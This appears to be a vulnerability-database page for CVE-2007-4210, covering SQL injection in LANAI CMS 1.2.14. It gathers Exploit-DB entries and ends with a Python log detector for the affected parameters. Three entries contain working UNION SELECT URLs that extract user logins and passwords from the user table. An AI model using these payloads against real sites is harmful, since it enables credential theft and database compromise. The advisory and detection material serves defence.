CVE-2007-4210
Published 2007-08-08
Priority P344 · high · CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 2.94% (85.4th percentile)
Multiple SQL injection vulnerabilities in module.php in LANAI (la-nai) CMS 1.2.14 allow remote attackers to execute arbitrary SQL commands via (1) the mid parameter in an faqviewgroup action in the FAQ Modules, (2) the cid parameter in the EZSHOPINGCART Modules, or (3) the gid parameter in a view action in the GALLERY Modules.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| redline_software | lanai_cms | — | — |
No detection rules found.
Exploit-DB
Lanius CMS 1.2.14 - Multiple SQL Injections
exploitdb·2007-08-06
---
#######################################################################
########### newhack[dot]org ############
########################################################################
# la-nai cms_v1.2.14 - Remote SQL Injection
# Vendor : http://www.redlinesoft.net/module.php?modname=content&cid=9
# Download : http://sourceforge.net/project/showfiles.php?group_id=191629
# Found By : k1tk4t - k1tk4t[4t]newhack.org [ http://newhack.org ]
# Location : Indonesia
########################################################################
the bug is in the la-nai modules
tested modules
-faq
-gallery
-ezshopingcart
and it is possibly present in other modules,
on the site's front-page login, login authentication can be bypassed
by using usern
Exploit-DB
Lanius CMS 1.2.14 FAQ Module - 'mid' SQL Injection
exploitdb·2007-08-03
---
source: https://www.securityfocus.com/bid/25193/info
LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
LANAI CMS 1.2.14 is vulnerable; other versions may also be affected.
http://www.example.com/module.php?modname=faq&mf=faqviewgroup&mid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,userLogin,userPassword,5,6,7/**/FROM/**/tbl_ln_user/*
Exploit-DB
Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' SQL Injection
exploitdb·2007-08-03
---
source: https://www.securityfocus.com/bid/25193/info
LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
LANAI CMS 1.2.14 is vulnerable; other versions may also be affected.
http://www.example.com/module.php?modname=ezshopingcart&ac=c&cid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,concat(userLogin,'-',userPassword),4,5/**/FROM/**/tbl_ln_user/*
Exploit-DB
Lanius CMS 1.2.14 GALLERY Module - 'gid' SQL Injection
exploitdb·2007-08-03
---
source: https://www.securityfocus.com/bid/25193/info
LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
LANAI CMS 1.2.14 is vulnerable; other versions may also be affected.
http://www.example.com/module.php?modname=gallery&mf=view&gid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,userLogin,userPassword,4/**/FROM/**/tbl_ln_user/*
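A log check for the three parameters named in this CVE, added here as an example and not taken from the advisory or from the LANAI project. It assumes combined-format access logs and that `mid`, `cid` and `gid` are integer IDs in legitimate requests; the function names and the sample log lines are constructed. It checks the three parameters on every `module.php` request rather than only the three listed modules, since the advisory says other modules may be affected.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters named in CVE-2007-4210. Treating them as integer IDs is an assumption.
ID_PARAMS = ("mid", "cid", "gid")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"\d{1,10}")

# Constructed sample lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Aug/2007:10:00:01 +0000] "GET /module.php?modname=content&cid=9 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Aug/2007:10:00:07 +0000] "GET /module.php?modname=faq&mf=faqviewgroup&mid=1/**/AND/**/1=2 HTTP/1.1" 200 734',
    '203.0.113.9 - - [06/Aug/2007:10:00:09 +0000] "GET /module.php?modname=gallery&mf=view&gid=1%27 HTTP/1.1" 200 611',
    '203.0.113.5 - - [06/Aug/2007:10:00:12 +0000] "GET /index.php?cid=abc HTTP/1.1" 200 900',
]

def suspicious_params(target):
    """Return [(modname, param, value)] for non-integer ID values sent to module.php."""
    url = urlsplit(target)
    if not url.path.lower().endswith("/module.php"):
        return []
    # parse_qs percent-decodes values, so encoded quotes and spaces are seen in clear.
    query = parse_qs(url.query, keep_blank_values=True)
    modname = query.get("modname", ["?"])[0].lower()
    hits = []
    for param in ID_PARAMS:
        for value in query.get(param, []):  # a parameter may be repeated
            if not INT_RE.fullmatch(value):
                hits.append((modname, param, value))
    return hits

def scan(lines):
    """Return [(line_number, modname, param, value)] for every flagged request."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            for hit in suspicious_params(match.group(1)):
                findings.append((lineno, *hit))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only the request line is inspected, so parameters sent in a POST body are not covered by this check.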
No writeups or analysis indexed.
http://osvdb.org/36438
http://osvdb.org/37470
http://osvdb.org/37471
http://secunia.com/advisories/26339
http://securityreason.com/securityalert/2975
http://www.securityfocus.com/archive/1/475447
http://www.securityfocus.com/bid/25193
https://exchange.xforce.ibmcloud.com/vulnerabilities/35786